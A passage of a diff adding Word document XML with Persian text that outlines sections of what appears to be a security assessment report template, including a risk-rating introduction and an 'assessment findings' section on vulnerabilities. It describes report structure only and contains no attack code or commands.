+        <w:t>هشداری</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مانند دسترس</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> به س</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ستم</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> و غ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ره</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> باشد. ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> بخش همچن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> با</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>د</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مقدمه ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> بر رت</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>به</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> بند</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>خطرکه در</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> طول گزارش</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>استفاده شده</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> و سپس خلاصه فن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>افته</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ها</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> باشد</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>III</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>. ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>افته</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ها</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ارز</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>اب</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">بخش آخر گزارش، بخش </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>یافته های</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ارز</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>اب</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> است که شامل جزئ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ات</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> فن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> دق</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ق</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> در مورد آس</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ب</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> پذ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ها</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> موجود و رو</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ه</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ها</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مورد ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>از</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> برا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
